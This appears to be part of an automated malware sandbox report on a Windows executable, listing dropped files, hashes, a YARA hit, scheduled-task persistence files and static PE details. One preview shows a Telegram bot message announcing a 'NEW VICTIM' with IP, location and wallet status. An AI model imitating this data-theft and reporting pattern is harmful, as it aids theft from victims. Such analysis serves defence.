SHA-512:	05125D14C265EED21453D2A6E8007F3BF2C2F339567718AF4F4A20C8EB1474EA73A7656B4EDF13B937B25AB3045601F49D19F8E47521C601FD17D3A218BE0D60
Malicious:	false
Reputation:	unknown
Preview:	{. "ip": "8.46.123.189",. "hostname": "static-cpe-8-46-123-189.centurylink.com",. "city": "New York City",. "region": "New York",. "country": "US",. "loc": "40.7143,-74.0060",. "org": "AS3356 Level 3 Parent, LLC",. "postal": "10001",. "timezone": "America/New_York",. "readme": "https://ipinfo.io/missingauth".}

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\output[1].png

Download File

Process:	C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe
File Type:	PNG image data, 438 x 438, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	156917
Entropy (8bit):	7.994509354006501
Encrypted:	true
SSDEEP:
MD5:	F89267B24ECF471C16ADD613CEC34473
SHA1:	C3AAD9D69A3848CEDB8912E237B06D21E1E9974F
SHA-256:	21F12ABB6DE14E72D085BC0BD90D630956C399433E85275C4C144CD9818CBF92
SHA-512:	C29176C7E1D58DD4E1DEAFCBD72956B8C27E923FB79D511EE244C91777D3B3E41D0C3977A8A9FBE094BAC371253481DDE5B58ABF4F2DF989F303E5D262E1CE4D
Malicious:	true
Yara Hits:	Rule: INDICATOR_SUSPICIOUS_IMG_Embedded_Archive, Description: Detects images embedding archives. Observed in TheRat RAT., Source: C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\output[1].png, Author: ditekSHen
Reputation:	unknown
Preview:	.PNG........IHDR................p....IDATx....\|.e....3......D dw6...S..Y.[......#L..g.r.....$XA=.f.............)...?.I.(.dv.3.l..~>~>..3.dw.y.<o.$I......+.a...t..=.h..@......#.....%X...C..TE....6g......0..q.......=.d>..e[-.R..,..$)YN<...2'..$..t.m.<l@...^..sJR.&..$%...c.....-9?a33..K..(+.[.$..2.IRk.xb..&..L..%..:.o....$)...&I..}.@b.u.}lny=...E.?..]IJ..LjK.4..#....$.......5...mK.....$.k.i.2....,8.j..`....C..E&6I....R..DzM.Ci..]..x{.*.H.S.HI2k.....s.Jj..(.....D."IN!..$..t...cE.....S.[t....r(R...>.Pr.. Gt(1.l`......@$I4.c.$..Ew;8.E(..>.AH.....$.d..B..T..d6Fa....$...A.$......Y!..D. I....$5g......@..PL2...a..D."I...U.$.c.O......r.. $I$..$...#..V.(.b..d..M.....cH.q(.v..B.D..M.b9f\>...H@>6.b...2.IR,.0 ..X....$."..$...~.CH.b. :.I.E&6I.EA..!$../:.I.E&6I.I...A.rE. I...&I.....B.h...$I...$).V...!a..C.$Qdb..X.\|':....+:.I.E&6I..:cM4..$c...$I...$)...v.X-:..l.......V..M..A.KE../"ZR_.L..Ll...C.D../..E. I"..&I...fth/uT.y...$.db......y.a.E..X....qH.H2.IR....@..8..

C:\Windows\System32\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE\sendMessage[1].json

Download File

Process:	C:\Users\user\AppData\Local\Temp\1019804001\cc6f25572f.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	777
Entropy (8bit):	5.1108586882706355
Encrypted:	false
SSDEEP:
MD5:	8943CD56009BABA4C7FAFD1ECBBEDB36
SHA1:	9084C723DE33A2A401041B2A22C8C83DFAA916CA
SHA-256:	5FEA1240ADC32CE2DEFEB338EDBD439B5D73D14E039669BB166A0C669DA11A97
SHA-512:	27C9DC91391D8779A541A293368FBEB26BBF34ACBFB2171CFAF3D486A29496FD49DE6C5FF0445C39528FBB927AB36078E8F043E369E909920399DD7534C41BD8
Malicious:	false
Reputation:	unknown
Preview:	{"ok":true,"result":{"message_id":30112,"from":{"id":7855878545,"is_bot":true,"first_name":"srhjdftjkw4","username":"srhjdftjkw4_bot"},"chat":{"id":7427009775,"first_name":"\u041a\u0430\u0440\u0434\u0430\u043d","last_name":"\u0412\u0430\u043b\u043e\u0432","username":"kardanvalov88","type":"private"},"date":1734830224,"text":"\ud83d\udd14NEW VICTIM - Extensions Installed\nIP Address: 8.46.123.189\nDevice Name: 715575\nLocation: New York City, New York, US\nWallets:\nNothing found","entities":[{"offset":0,"length":35,"type":"bold"},{"offset":36,"length":11,"type":"bold"},{"offset":48,"length":12,"type":"url"},{"offset":61,"length":12,"type":"bold"},{"offset":81,"length":9,"type":"bold"},{"offset":119,"length":8,"type":"bold"},{"offset":128,"length":13,"type":"code"}]}}

C:\Windows\Tasks\Gxtuum.job

Download File

Process:	C:\Users\user\AppData\Local\Temp\1019803001\7739517025.exe
File Type:	data
Category:	dropped
Size (bytes):	284
Entropy (8bit):	3.4267697404503656
Encrypted:	false
SSDEEP:
MD5:	5591C67FFF38B3655EA8C899CCDD16D9
SHA1:	1820F091660C80DBFBAF10F83CD9A8C1C4324719
SHA-256:	0594C3266077DF7DF3C5EC7A85EB3315143DCFB596441FDD9A05E68E1015FAAA
SHA-512:	22BDA38A4CEA311FDEE7C78CE1593F6C5087FC2E1E7FD1D5971EDF88FC9D11B4EA6E4D050D12E055761728428E784A9FE765C16206D4126320E179A068D9C0F4
Malicious:	false
Reputation:	unknown
Preview:	....D.R..u.G....,..fF.......<... .....s.......... ....................8.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.e.4.5.8.d.2.6.3.c.0.\.G.x.t.u.u.m...e.x.e.........J.O.N.E.S.-.P.C.\.j.o.n.e.s...................0...................@3P.........................

C:\Windows\Tasks\skotes.job

Download File

Process:	C:\Users\user\Desktop\file.exe
File Type:	data
Category:	dropped
Size (bytes):	284
Entropy (8bit):	3.4079493954928073
Encrypted:	false
SSDEEP:
MD5:	B0AECD975DAE8390839435D55E5462F6
SHA1:	8D90409099FDF01DD97E85B47BD54633235A137F
SHA-256:	1FDF3A8A39523924A41D71E7212EBA43440E59BAF11A80CF1790C4A4C70DD1C1
SHA-512:	58D6B8185119687DD0238C7A5EE9C867B00C97A61D95AE7434D1959BA9026CCE8A7E900F764605F8AA21C7DF703F09D7EAFAC8761D0832D6439312BC1FA80498
Malicious:	false
Reputation:	unknown
Preview:	.....Zo_.=.D...r.%..F.......<... .....s.......... ....................8.C.:.\.U.s.e.r.s.\.j.o.n.e.s.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.T.e.m.p.\.a.b.c.3.b.c.1.9.8.5.\.s.k.o.t.e.s...e.x.e.........J.O.N.E.S.-.P.C.\.j.o.n.e.s...................0...................@3P.........................

Chrome Cache Entry: 147

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (3415)
Category:	dropped
Size (bytes):	3420
Entropy (8bit):	5.843287110148945
Encrypted:	false
SSDEEP:
MD5:	B30FF78546B2CA5DB5C65E5D6EF82C61
SHA1:	A167CF7A1ABE38A2F39D74770DF928A0400FF8C2
SHA-256:	95A2D5C3CD95465B04DC48FC6B07CE3E69F4872357CB22EEA51656E0CEC7373D
SHA-512:	6DAD2D7D40B6009670FA3B7BF4768A9B025783FD0AFC7E0787E204D33A6570FBE911AFE42315D9A99446C909415BAF00236A6563B856F2853841E33765398E5B
Malicious:	false
Reputation:	unknown
Preview:	)]}'.["",["ps5 pro","roh wrestling final battle","commercial tea bags microplastics","dogecoin price prediction","anthony rizzo","the eddie aikau big wave invitational","ursids meteor shower","apple iphone 17 pro max"],["","","","","","","",""],[],{"google:clientdata":{"bpc":false,"tlw":false},"google:groupsinfo":"ChgIkk4SEwoRVHJlbmRpbmcgc2VhcmNoZXM\u003d","google:suggestdetail":[{"zl":10002},{"zl":10002},{"zl":10002},{"zl":10002},{"google:entityinfo":"CgovbS8wZ2ZmNXZqEh9BbWVyaWNhbiBiYXNlYmFsbCBmaXJzdCBiYXNlbWFuMocOZGF0YTppbWFnZS9qcGVnO2Jhc2U2NCwvOWovNEFBUVNrWkpSZ0FCQVFBQUFRQUJBQUQvMndDRUFBa0dCd2dIQmdrSUJ3Z0tDZ2tMRFJZUERRd01EUnNVRlJBV0lCMGlJaUFkSHg4a0tEUXNKQ1l4Sng4ZkxUMHRNVFUzT2pvNkl5cy9SRDg0UXpRNU9qY0JDZ29LRFF3TkdnOFBHamNsSHlVM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOemMzTnpjM056YzNOLy9BQUJFSUFFQUFRQU1CSWdBQ0VRRURFUUgveEFBYUFBQURBUUVCQVFBQUFBQUFBQUFBQUFBRkJnY0VBZ01BLzhRQU5SQUFBZ0VEQXdFRkJRWUhBUUFBQUFBQUFRSURBQVFSQlJJaE1RWVRRVkdSSWpKaGdhRVVVbkd4d2VFVkpVS1N

Chrome Cache Entry: 148

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (1395)
Category:	dropped
Size (bytes):	117446
Entropy (8bit):	5.490775275046353
Encrypted:	false
SSDEEP:
MD5:	942EA4F96889BAE7D3C59C0724AB2208
SHA1:	033DDF473319500621D8EBB6961C4278E27222A7
SHA-256:	F59F7F32422E311462A6A6307D90CA75FE87FA11E6D481534A6F28BFCCF63B03
SHA-512:	C3F27662D08AA00ECBC910C39F6429C2F4CBC7CB5FC9083F63390047BACAF8CD7A83C3D6BBE7718F699DAE2ADA486F9E0CAED59BC3043491EECD9734EC32D92F
Malicious:	false
Reputation:	unknown
Preview:	gapi.loaded_0(function(_){var window=this;._._F_toggles_initialize=function(a){(typeof globalThis!=="undefined"?globalThis:typeof self!=="undefined"?self:this)._F_toggles=a\|\|[]};(0,_._F_toggles_initialize)([]);.var ca,da,ha,ma,xa,Aa,Ba;ca=function(a){var b=0;return function(){return b<a.length?{done:!1,value:a[b++]}:{done:!0}}};da=typeof Object.defineProperties=="function"?Object.defineProperty:function(a,b,c){if(a==Array.prototype\|\|a==Object.prototype)return a;a[b]=c.value;return a};.ha=function(a){a=["object"==typeof globalThis&&globalThis,a,"object"==typeof window&&window,"object"==typeof self&&self,"object"==typeof global&&global];for(var b=0;b<a.length;++b){var c=a[b];if(c&&c.Math==Math)return c}throw Error("a");};_.la=ha(this);ma=function(a,b){if(b)a:{var c=_.la;a=a.split(".");for(var d=0;d<a.length-1;d++){var e=a[d];if(!(e in c))break a;c=c[e]}a=a[a.length-1];d=c[a];b=b(d);b!=d&&b!=null&&da(c,a,{configurable:!0,writable:!0,value:b})}};.ma("Symbol",function(a){if(a)return a;var b

Chrome Cache Entry: 149

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	29
Entropy (8bit):	3.9353986674667634
Encrypted:	false
SSDEEP:
MD5:	6FED308183D5DFC421602548615204AF
SHA1:	0A3F484AAA41A60970BA92A9AC13523A1D79B4D5
SHA-256:	4B8288C468BCFFF9B23B2A5FF38B58087CD8A6263315899DD3E249A3F7D4AB2D
SHA-512:	A2F7627379F24FEC8DC2C472A9200F6736147172D36A77D71C7C1916C0F8BDD843E36E70D43B5DC5FAABAE8FDD01DD088D389D8AE56ED1F591101F09135D02F5
Malicious:	false
Reputation:	unknown
Preview:	)]}'.{"update":{"promos":{}}}

Chrome Cache Entry: 150

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65531)
Category:	dropped
Size (bytes):	132769
Entropy (8bit):	5.436983389096339
Encrypted:	false
SSDEEP:
MD5:	FF51342AA86E096E93A550F5C14AE095
SHA1:	0179FACA8AF0A20A34EB905772D52B30D5959BD7
SHA-256:	92C2041D8C1072BCC1D22D94B3C4630EFBFD264A379FCCEA7461C06E1D706B8B
SHA-512:	08CB1D0E7B97EA9ACCBC77FB7CBFBD44EB93B99D7D6DCB2F2A99B4FABDA493997B659B04558EAB95F37BC12376A323B086DD40CBD5C73218B2706AE915735C4E
Malicious:	false
Reputation:	unknown
Preview:	)]}'.{"update":{"language_code":"en-US","ogb":{"html":{"private_do_not_access_or_else_safe_html_wrapped_value":"\u003cheader class\u003d\"gb_Ea gb_2d gb_Qe gb_qd\" id\u003d\"gb\" role\u003d\"banner\" style\u003d\"background-color:transparent\"\u003e\u003cdiv class\u003d\"gb_Pd\"\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_kd gb_od gb_Fd gb_ld\"\u003e\u003cdiv class\u003d\"gb_wd gb_rd\"\u003e\u003cdiv class\u003d\"gb_Jc gb_Q\" aria-expanded\u003d\"false\" aria-label\u003d\"Main menu\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M3 18h18v-2H3v2zm0-5h18v-2H3v2zm0-7v2h18V6H3z\"\u003e\u003c\/path\u003e\u003c\/svg\u003e\u003c\/div\u003e\u003cdiv class\u003d\"gb_Jc gb_Mc gb_Q\" aria-label\u003d\"Go back\" title\u003d\"Go back\" role\u003d\"button\" tabindex\u003d\"0\"\u003e\u003csvg focusable\u003d\"false\" viewbox\u003d\"0 0 24 24\"\u003e\u003cpath d\u003d\"M20 11H7.83l5.59-5.59L12 4l-8 8 8 8 1.41-1.

Chrome Cache Entry: 151

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (2410)
Category:	dropped
Size (bytes):	175897
Entropy (8bit):	5.549876394125764
Encrypted:	false
SSDEEP:
MD5:	2368B9A3E1E7C13C00884BE7FA1F0DFC
SHA1:	8F88AD448B22177E2BDA0484648C23CA1D2AA09E
SHA-256:	577E04E2F3AB34D53B7F9D2F6DE45A4ECE86218BEC656B01DCAFF1BF6D218504
SHA-512:	105D51DE8FADDE21A134ACA185AA5C6D469B835B77BEBEC55A7E90C449F29FCC1F33DAF5D86AA98B3528722A8F533800F5146CCA600BC201712EBC9281730201
Malicious:	false
Reputation:	unknown
Preview:	this.gbar_=this.gbar_\|\|{};(function(_){var window=this;.try{._.Ui=function(a){if(4&a)return 4096&a?4096:8192&a?8192:0};_.Vi=class extends _.Q{constructor(a){super(a)}};.}catch(e){_._DumpException(e)}.try{.var Wi,Xi,aj,dj,cj,Zi,bj;Wi=function(a){try{return a.toString().indexOf("[native code]")!==-1?a:null}catch(b){return null}};Xi=function(){_.Ka()};aj=function(a,b){(_.Yi\|\|(_.Yi=new Zi)).set(a,b);(_.$i\|\|(_.$i=new Zi)).set(b,a)};dj=function(a){if(bj===void 0){const b=new cj([],{});bj=Array.prototype.concat.call([],b).length===1}bj&&typeof Symbol==="function"&&Symbol.isConcatSpreadable&&(a[Symbol.isConcatSpreadable]=!0)};_.ej=function(a,b,c){a=_.rb(a,b,c);return Array.isArray(a)?a:_.Ac};._.fj=function(a,b){a=2&b?a\|2:a&-3;return(a\|32)&-2049};_.gj=function(a,b){a===0&&(a=_.fj(a,b));return a\|1};_.hj=function(a){return!!(2&a)&&!!(4&a)\|\|!!(2048&a)};_.ij=function(a,b,c){32&b&&c\|\|(a&=-33);return a};._.lj=function(a,b,c,d,e,f,g){a=a.ha;var h=!!(2&b);e=h?1:e;f=!!f;g&&(g=!h);h=_.ej(a,b,d);var k=h[_

Chrome Cache Entry: 152

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (5162), with no line terminators
Category:	dropped
Size (bytes):	5162
Entropy (8bit):	5.3503139230837595
Encrypted:	false
SSDEEP:
MD5:	7977D5A9F0D7D67DE08DECF635B4B519
SHA1:	4A66E5FC1143241897F407CEB5C08C36767726C1
SHA-256:	FE8B69B644EDDE569DD7D7BC194434C57BCDF60280078E9F96EEAA5489C01F9D
SHA-512:	8547AE6ACA1A9D74A70BF27E048AD4B26B2DC74525F8B70D631DA3940232227B596D56AB9807E2DCE96B0F5984E7993F480A35449F66EEFCF791A7428C5D0567
Malicious:	false
Reputation:	unknown
Preview:	.gb_P{-webkit-border-radius:50%;border-radius:50%;bottom:2px;height:18px;position:absolute;right:0;width:18px}.gb_Ja{-webkit-border-radius:50%;border-radius:50%;-webkit-box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);box-shadow:0px 1px 2px 0px rgba(60,64,67,.30),0px 1px 3px 1px rgba(60,64,67,.15);margin:2px}.gb_Ka{fill:#f9ab00}.gb_F .gb_Ka{fill:#fdd663}.gb_La>.gb_Ka{fill:#d93025}.gb_F .gb_La>.gb_Ka{fill:#f28b82}.gb_La>.gb_Ma{fill:white}.gb_Ma,.gb_F .gb_La>.gb_Ma{fill:#202124}.gb_Na{-webkit-clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 31.3282C19.1443 31.7653 17.5996 32 16 32C7.16344 32 0 24.8366 0 16C0 7.16344 7.16344 0 16 0Z");clip-path:path("M16 0C24.8366 0 32 7.16344 32 16C32 16.4964 31.9774 16.9875 31.9332 17.4723C30.5166 16.5411 28.8215 16 27 16C22.0294 16 18 20.0294 18 25C18 27.4671 18.9927 29.7024 20.6004 3

Chrome Cache Entry: 153

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	SVG Scalable Vector Graphics image
Category:	dropped
Size (bytes):	1660
Entropy (8bit):	4.301517070642596
Encrypted:	false
SSDEEP:
MD5:	554640F465EB3ED903B543DAE0A1BCAC
SHA1:	E0E6E2C8939008217EB76A3B3282CA75F3DC401A
SHA-256:	99BF4AA403643A6D41C028E5DB29C79C17CBC815B3E10CD5C6B8F90567A03E52
SHA-512:	462198E2B69F72F1DC9743D0EA5EED7974A035F24600AA1C2DE0211D978FF0795370560CBF274CCC82C8AC97DC3706C753168D4B90B0B81AE84CC922C055CFF0
Malicious:	false
Reputation:	unknown
Preview:	<svg xmlns="http://www.w3.org/2000/svg" width="74" height="24" viewBox="0 0 74 24"><path fill="#4285F4" d="M9.24 8.19v2.46h5.88c-.18 1.38-.64 2.39-1.34 3.1-.86.86-2.2 1.8-4.54 1.8-3.62 0-6.45-2.92-6.45-6.54s2.83-6.54 6.45-6.54c1.95 0 3.38.77 4.43 1.76L15.4 2.5C13.94 1.08 11.98 0 9.24 0 4.28 0 .11 4.04.11 9s4.17 9 9.13 9c2.68 0 4.7-.88 6.28-2.52 1.62-1.62 2.13-3.91 2.13-5.75 0-.57-.04-1.1-.13-1.54H9.24z"/><path fill="#EA4335" d="M25 6.19c-3.21 0-5.83 2.44-5.83 5.81 0 3.34 2.62 5.81 5.83 5.81s5.83-2.46 5.83-5.81c0-3.37-2.62-5.81-5.83-5.81zm0 9.33c-1.76 0-3.28-1.45-3.28-3.52 0-2.09 1.52-3.52 3.28-3.52s3.28 1.43 3.28 3.52c0 2.07-1.52 3.52-3.28 3.52z"/><path fill="#4285F4" d="M53.58 7.49h-.09c-.57-.68-1.67-1.3-3.06-1.3C47.53 6.19 45 8.72 45 12c0 3.26 2.53 5.81 5.43 5.81 1.39 0 2.49-.62 3.06-1.32h.09v.81c0 2.22-1.19 3.41-3.1 3.41-1.56 0-2.53-1.12-2.93-2.07l-2.22.92c.64 1.54 2.33 3.43 5.15 3.43 2.99 0 5.52-1.76 5.52-6.05V6.49h-2.42v1zm-2.93 8.03c-1.76 0-3.1-1.5-3.1-3.52 0-2.05 1.34-3.52 3.1-3

Chrome Cache Entry: 154

Download File

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	ASCII text, with very long lines (65531)
Category:	dropped
Size (bytes):	73319
Entropy (8bit):	6.023928661569486
Encrypted:	false
SSDEEP:
MD5:	98B2985B31BACD87AE2B0CABE8C78739
SHA1:	49D00DCCC18526FC8828861DAEA802DAAFCECE34
SHA-256:	CEE61FB2AAC652A91C53366677E9DD92B11B2FF4825E34F41EF853FEB1831E4D
SHA-512:	1B3B805C2098DF70F4FDE514A0FFEF9C5FF4FDEFAA9383C65281437E77EBA71DB78299CE8091516344355FD7FEBC803B2AB0AB85F24E25F89E2BAAD1E20AD493
Malicious:	false
Reputation:	unknown
Preview:	)]}'.{"ddljson":{"accessibility_description":"","alt_text":"Seasonal Holidays 2024","dark_data_uri":"data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAlgAAAD6CAMAAABK88kiAAADAFBMVEVHcEyQ+f/+sZLpsOD65JP9ew7lnun943b3PjryTED+krT683n/ODb9lr7/NjP9bIDejvz/mLz+krP/iqj/sNz/tOL8m8r+ZXbZivzci/r/Mi3/eJD/hKH/nNX8W2n/NTL8XWzbjP4P/Oj9ODb6XXn/My/5OTjCZXX4WnW2WW8D++H7S3T+TF/7NDHWVH38ZZnmY6y2WJLyYqv+WEj+ca/7XqD6Mi0F7OX4MiyqS0ycVmEM8OYA7f8A8eUE4fv+QEIB7v8A6fv7Lif8MCoD9d/9NDAJ8NacSkkI6uoH7eKTT0z6Lyf+QYHsQDbGPT+wQUHdNDFiYWP+LCVhXFxcWlpgWl0ugPoLR+pbW1pbWltdW15OVn5fYF1cXVz7LCVcXFxFR5oNQuMLPe1PXVwwQbQQPvsue/QKOvD9Licyhvgug/gAbOY1hPgE7dUA2+oAy+UAnen+50r97Fj+6lD961k0hvgsg/stg/pdZ14A8f8A2PH/6Uv97Vb/7U/+7VIvgfctg/sH9tD95kv+6k/ZzFRmV1QA/sX85EqHg1qmlUj33UIHpUkBrEgFp0x6dFUAI+Nzfolwe3KQnbBdWVxeX1+xTk+z/+Gdx86s4ez88WiJTU1pbmqEoKW05/qk9NG16PwBsUav/N4axCkQfj16UU91KXqNQJgVgUAFsWg/PM37vhB7VG37uQ/8wA7+uwH5vxGen3r7gNb/gtrZi//7vRCw/eDVsStAqOw3jfnz+p0+rO7ld9xEo+rbi/7TavjVffPNL/2cTa6nbsrbi/6eXbIyh/tqjvpvjf7+Tay1qFNxivx1kP9Tif2Vj

\Device\ConDrv

Download File

Process:	C:\Users\user\AppData\Local\Temp\main\7z.exe
File Type:	ASCII text, with CRLF, CR line terminators
Category:	dropped
Size (bytes):	350
Entropy (8bit):	5.0682682106683945
Encrypted:	false
SSDEEP:
MD5:	2F644B7E25627553C5731B735473C859
SHA1:	5A3C2158A1FCF27AE6807A8079894FFE8D33FBEA
SHA-256:	2B34B0DE62F49C19D1F9A004AD698E2612F7FCD5072F5C9834621C62F15FB55F
SHA-512:	E83CA818C9785EB3A0297E65F08E22DC9E29A368BCADC9887B64EC746C88B79ACBAD20B4B6D49C07CB819ACE21B00C2BEB083F18A0CD5528D2BD00A7B0C4E802
Malicious:	false
Reputation:	unknown
Preview:	..7-Zip 19.00 (x64) : Copyright (c) 1999-2018 Igor Pavlov : 2019-02-21....Scanning the drive for archives:.. 0M Scan. .1 file, 1799594 bytes (1758 KiB)....Extracting archive: extracted\file_1.zip..--..Path = extracted\file_1.zip..Type = zip..Physical Size = 1799594.... 0%. .Everything is Ok....Size: 1827328..Compressed: 1799594..

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	6.675956678732107
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	file.exe
File size:	3'263'488 bytes
MD5:	cf6393e173fb6315d0c681bc78eb3528
SHA1:	26dc307ae4ea1866d40c9a34e38768733ec30b34
SHA256:	3dee7134cbeea75160519a338fc848a18af80c46ef475fcd3c69a463d449c35d
SHA512:	47e722c9f4736faf9612aff748cb4e1211e00ffe0fe56a65dc0dbec07f7b5e81908269d7c31066250866f3459727874d88c27fa88be08e540d0eb1e048ced61f
SSDEEP:	24576:O/Nvd7MjWuH7NZRmw3vb+VBi7cCgTUvRS6r0EexLRdno+gSMW7GQJKTJjmX0/4hH:kliWo533j+na3bJrGYnlCJMdPS/b
TLSH:	E0E53A52A514B1CBD4DA17BD842BDE615D7D82F4672008C3B838A5FAFE63CC015B7CAA
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C................

File Icon


Icon Hash:	90cececece8e8eb0

Static PE Info

General

Entrypoint:	0x71d000
Entrypoint Section:	.taggant
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x66F0569C [Sun Sep 22 17:40:44 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	2eabe9054cad5152567f0699947a2c5b

Entrypoint Preview

Instruction
jmp 00007F0E6451699Ah
rsm
xor dword ptr [eax], eax
add byte ptr [eax], al
add byte ptr [eax], al
jmp 00007F0E64518995h
add byte ptr [esi], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], dh
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [esi], al
or al, byte ptr [eax]
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [ecx], al
add byte ptr [eax], 00000000h
add byte ptr [eax], al
add byte ptr [eax], al
adc byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add dword ptr [edx], ecx
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x6a057	0x6b	.idata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x69000	0x5d4	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x31bc94	0x10	dblbhqnk
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x31bc44	0x18	dblbhqnk
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
	0x1000	0x68000	0x68000	3dccd6b18f1f732822e2d2c807fb6442	False	0.5582275390625	data	7.022156452672956	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0x69000	0x5d4	0x600	1e55db351164df1643ae87d7efa3ee0f	False	0.4303385416666667	data	5.417125179370491	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0x6a000	0x1000	0x200	cc76e3822efdc911f469a3e3cc9ce9fe	False	0.1484375	data	1.0428145631430756	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
